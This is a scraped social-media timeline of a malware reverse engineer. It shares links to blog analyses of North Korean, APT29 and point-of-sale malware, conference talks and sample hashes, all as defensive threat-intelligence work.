@KevinPerlow profile picture
Kevin Perlow @KevinPerlow

RE and CTI. Feel free to take a gander at my past presentations: norfolkinfosec.com/presentat…

Joined January 2011
  • Tweets 138
  • Following 21
  • Followers 1,285
50 Photos and videos
Some North Korean post infection malware. Nothing groundbreaking, I just always like to see the actual code when vendors gloss over it: norfolkinfosec.com/north-kor… I’ve included hashes where the files were on VT, if you want to grab them to look for yourself.
1
7
15
1,852
Some notes and testing on (what I think is) a #VIRTUALGATE sample, following Mandiant's ESXI report: norfolkinfosec.com/some-note… MD5 3c7316012cba3bbfa8a95d7277cda873 -Opens VMCI listener on 25736 -Listens -Runs what it receives via cmd Post shows RE how to test it. Cool malware
4
10
30
Kevin Perlow retweeted
Cat @ BlackHat Asia @coolestcatiknow
29 Apr 2021
.@MITREattack v9 is out!!! A big shout out 🙌 to @patrickwardle, @thomasareed, @its_a_feature_ , and @xorrior for helping us update changes to macOS🍎. There is more to come...but let's take a moment to appreciate my new favorite gif, which summarizes this release perfectly!
ATT&CK @MITREattack
29 Apr 2021
It has launched! ATT&CK v9 is now live with refactored data sources, ATT&CK for Containers, Google Workspace as a platform and more! Read about new data sources and the rest of the update at medium.com/mitre-attack/atta… or attack.mitre.org/resources/u… for new/changed groups/techniques/sw.
8
16
44
Also, my personal favorite talk from the conference was from @JamesPavur - A fantastic presentation on eavesdropping on satellite internet conversations. youtu.be/d5Sbwlu6f8o No technical satellite knowledge required (I barely know how they get up there)

Whispers Among the Stars: A Practical Look at Perpetrating Satellite...

This briefing presents an experimental look at attacking satellite ...

youtube.com
1
5
They put our BlackHat videos up the other day! :) It's a bit old now, but if you want to see how #Lazarus used ISO-8583 for the #FASTCash malware in past years, here's the URL: youtu.be/zGvQPtejX9w Feedback is always welcome - presenting to a glowing orb was not the easiest.
6
17
Last #Lazarus #ZINC update: a source gave me the missing registry data (~2mb reg entry). Sorry for the spam... have to do this after hours. Updated w/ brief analysis of Stage 2: norfolkinfosec.com/dprk-targ… Screengrab, process launching, recon etc. That's it from me for a while :)
Kevin Perlow @KevinPerlow
1 Feb 2021
Part II: Looking at the #DPRK /#Lazarus/#ZINC .sys malware targeting security researchers, with a hunt hypothesis as the highlight: norfolkinfosec.com/dprk-targ… Note that I *don't* have the Stage 2 registry data. Would love to see it if someone has a copy!
5
25
Part II: Looking at the #DPRK /#Lazarus/#ZINC .sys malware targeting security researchers, with a hunt hypothesis as the highlight: norfolkinfosec.com/dprk-targ… Note that I *don't* have the Stage 2 registry data. Would love to see it if someone has a copy!
1
36
87
A look at some of the malware mentioned in this Google TAG research. norfolkinfosec.com/dprk-malw… - Two-stage (payload in ProgramData) - AV Check (Kasp, Avast) - Basic Persistence - Multiple C2s per payload More to be done re:C2 comm (unless someone does it first) #DPRK
Shane Huntley
 @ShaneHuntley
26 Jan 2021
New blog post from TAG with details of a North Korean campaign targeting security researchers working on vulnerability research and development. blog.google/threat-analysis-… Stay safe out there everyone!
1
74
180
Interesting possible relationship between #TinyPOS #ProLocker norfolkinfosec.com/tinypos-a… I lean towards, "would makes sense if it's the same group," but far from definitive. Was trying to find infrastructure. @DrunkBinary (for the hashes) @cyb3rops (for code segments and YARA)
15
41
Really awesome to be included in part of the Wired write-up! 🙂 For folks looking for the slides and whitepaper, both are linked here: norfolkinfosec.com/presentat… Whitepaper has a summary of tool relationships from the #FASTCash adversary some extra RE.

Lily Hay Newman @lilyhnewman
15 Aug 2020
"What has fundamentally changed between when Barnaby Jack presented and now?" @angcui wired.com/story/atm-hackers-…
9
Kevin Perlow retweeted
Sean Kerner
 @TechJournalist
5 Aug 2020
LOVING the live Q&A *DURING* the #BHUSA session with @KevinPerlow on financial malware. Learning lots.
1
5
Looking back at LiteDuke (#APT29/#CozyDuke): norfolkinfosec.com/looking-b… Found a copy and wanted to do some RE to build on @ESETresearch's previous great work. Post includes deeper dive into the available commands and some of the techniques used.
1
17
43
Unpacked payload: virustotal.com/gui/file/391b… Remember, this is old malware (late 2014). That being said, I *do* think it has some really interesting components. Was worth at least going down the rabbit hole.
1
3
My April Fool's present: Incident Response, the "Bored" Game. Please verb responsibly. @DrunkBinary @VK_Intel @magerbomb @jdenne79 *Might be worth playing with blank squares and a "dungeon master" who tracks the rolls and reads the squares.
1
3
23
Golang walkthrough - A look back at some old (2017) #Dragonfly / #DYMALLOY "Goodor" using newer tools: norfolkinfosec.com/a-new-loo… Always how Goodor *actually* worked. Redress from @joakimkennedy helps answer that question. CC @DrunkBinary
12
30
Analysis of #FIN8 #PoSlurp payload relevant to VISA fuel pump report (incident 2): norfolkinfosec.com/fuel-pump… I put the payload on VT (for static analysis): 3d5ae56c6746e0b3ed5b15124264a0d2 Credit to @just_windex for initial shellcode. cc @DrunkBinary @cyb3rops for tracking/sigs
3
45
101
I wanted to supplement other research out there re:#PoSlurp. Some thoughts: - LOTS of exit checks - Seems to need env variable to specifically be set via PowerShell - Different approach by targeting a specific process - Interesting registry references (likely persistence)
1
Analysis of #FrameworkPOS/#GratefulPOS file reported by @VisaSecurity (Incident1) norfolkinfosec.com/pos-malwa… Of note-Not sure people's public RE of this smaller file has been accurate. No obvious DNS in this DLL, and memscrp.stp is just an off switch. Details in post @DrunkBinary
1
14
41
Non-DNS 32ccf851b0b81252aa2bfdf2e8b416cb 0eb7ac6d2d99d702ecc8b86ff90b0aac 576039d7cb54b749af5ed3d3558ee296 DNS 0576380f93f49279491177d96d84ad7e 353b0df3a9efce2d32f6097cab8fffc3 128f75f8c80d65d416c740a6d4c1591e 4ed6cc403d5ea6abae458ba6f43ad4f3
1
1
2
To be clear, VISA's writeup is fine. I've just seen commentary elsewhere about the non-DNS files above doing DNS, and after a lot of hours, analysis suggests it's not there. Happy to update the post if I'm wrong. Maybe people just referenced the wrong hashes by mistake.
1
Load more